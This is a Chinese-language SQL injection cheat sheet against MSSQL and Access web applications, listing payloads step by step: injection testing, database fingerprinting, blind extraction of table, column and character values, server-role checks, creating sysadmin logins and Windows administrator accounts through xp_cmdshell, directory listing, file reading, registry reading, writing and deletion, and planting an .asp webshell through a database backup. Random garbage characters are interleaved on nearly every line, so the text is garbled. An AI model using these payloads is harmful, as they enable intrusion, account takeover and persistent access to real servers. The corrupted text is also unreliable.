1.判断是否有注入;and 1=1 ;and 1=2 �x�1�:��Pj
2.初步判断是否是mssql ;and user>0 VyoE5�o���
Qw<kX*fxrI
3.注入参数是字符'and [查询条件] and ''=' �+# RlX3P�
o�B�j>9�I;
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��NB+$��ym
!��/4�V�^H
5.判断数据库系统 rX!�+@>4_L
g�/���l0}%
;and (select count(*) from sysobjects)>0 mssql &=z1$ih>2\
O�~#uQ��m�
;and (select count(*) from msysobjects)>0 access ? gA=39[�j
*]m kyAh�i
�ci�,o8 [Y
u3M`�'Y�Cb
6.猜数据库 ;and (select Count(*) from [数据库名])>0 y4/��>Ol]
N8�kb�-2�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 i_0��,BV�C
%on9C��`�/
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9uw,-0*5��
!#c[~er�NZ
9.(1)猜字段的ascii值(access) ����lbKv��
V5yx��Qb
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ��Q.9Ph�
~
]@/�^_�f>D
(2)猜字段的ascii值(mssql) ?R��t�1CDu
�x0u?�*5-t
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �7~kpRa@\P
4>�$
�;g�H
10.测试权限结构(mssql) Ej+]^t��$\
h\�=p=M�
{
�OxA��Y_
�J�A?��,0S
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �Ez�/\bE�
N�&I8n�Z9�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- S�2'`|��uI
�V�#�gF*]q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �6bbZ<E5At
�,5��eH2�W
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �{DEz��uU
wR�����Xn9
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- BrN�G%�%n�
[+;FV�!M6
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ?AV�&@EX2C
]cF�1c90%�
;and 1=(select IS_MEMBER('db_owner'));-- hl6,#2���$
/<�(*/�P,>
y�:g7'+�c
P���Pwxk;
11.添加mssql和系统的帐户 (3�0<oE�{
H
_�Zo@y~J
;exec master.dbo.sp_addlogin username;-- ��'a�;i�ni
;exec master.dbo.sp_password null,username,password;-- (
�}]3��7�
W{�f�U�L�l
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- z�G-_!�FIn
�K�k!�6�B�
;exec master.dbo.xp_cmdshell 'net user username password %�r�pR�-}j
�/S7�+�B�]
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ]�z-'�]�R;
%_B:EM��Pd
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 9RG\UbX)^|
N,j>;x3�xT
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- !�l�Q#sL`�
Z�?~gQ��
$
[{S;%Jj*X/
2V�z'n@g=�
12.(1)遍历目录 M1AZ}b�c0]
�:�DZLj��C
;create table dirs(paths varchar(100), id int) @9O�e��C
O
xa8�7xX�=a
;insert dirs exec master.dbo.xp_dirtree 'c:\' o �&�BPG@n
��G$;>ueM�
;and (select top 1 paths from dirs)>0 g2g�`��,"T
�ps"/�}u l
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �t�o9�9�_2
sg3h i"Im�
��w�1wXTt�
KY4d+�~2
(2)遍历目录 _MM���� �
u^`eKa�k"l
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Z�|2E��b*�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 &�mh �Ln4^
'R^i�KN�Ps
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 x�GK�fej9�
wr���H7 pd
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 lZ���}�izl
LQh^�;
]^(
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 V�DB$"T�9#
�i T�d-n9�
qTy�g~]e9(
f�!5F]qP>-
13.mssql中的存储过程 Y.Dw��tfE�
iK�g�75%;t
xp_regenumvalues 注册表根键, 子键 "#�*��Nn�t
I�Yuyj(/�!
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �&g*kl�t'B
�|.1qy,|!X
xp_regread 根键,子键,键值名 )r ULT$;i@
�$GQ�phXb$
;exec xp_regread �0��(w�f{5
fH-��NU�-"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 j �h;�
9
[
(��FM4 ^#6
xp_regwrite 根键,子键, 值名, 值类型, 值 H�ab!qWK`�
OZ�G0AX+=#
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 O�[; +i��
QZ?d2PC=>?
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �S*4��f%!�
Xa4GqV9M/-
xp_regdeletevalue 根键,子键,值名 ��FI\IY�
R
'4$lL�6ly>
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 gz��or%�)C
>OT���\~�C
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 S�,lxM,DL&
�doLkrEm&�
�s�mV!y�8&
dY1J�<L}")
14.mssql的backup创建webshell hQJo�~�'W=
[�u[� U_g*
use model /�E)9�v�$!
iDZ�rK%f�l
create table cmd(str image); <l�FdexH"T
�]x2Jpk99a
insert into cmd(str) values (''); 6A}eS��G3�
�d;{y`4p)s
backup database model to disk='c:\l.asp'; (/'h4KS@��
])C>\@c6Gm
}xqXd�%uz�
qB+n6y��%�
15.mssql内置函数 &(�g��|="T
�LaDY`u0G%
;and (select @@version)>0 获得Windows的版本号 9J?W '�8s5
P�2On�k�l�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa kg:l:�C)Tq
s,w YlVYf!
;and (select user_name())>0 爆当前系统的连接用户 9GT��h�yY�
0Su�_#".-*
;and (select db_name())>0 得到当前连接的数据库 ��N3Z�iG�D
�\�4�aK�Lr
Y�:�wF5pp;
Khj=l�lo,�
16.简洁的webshell h77�IW�o6%
)L�b�72;!?
use model �����8\DME
�@.k�5MOn�
create table cmd(str image); ^+M�>�<jE9
l�DC��}�HC
insert into cmd(str) values (''); g&b�wtE��Z
>���=�Js�v
backup database model to disk='g:\wwwtest\l.asp';
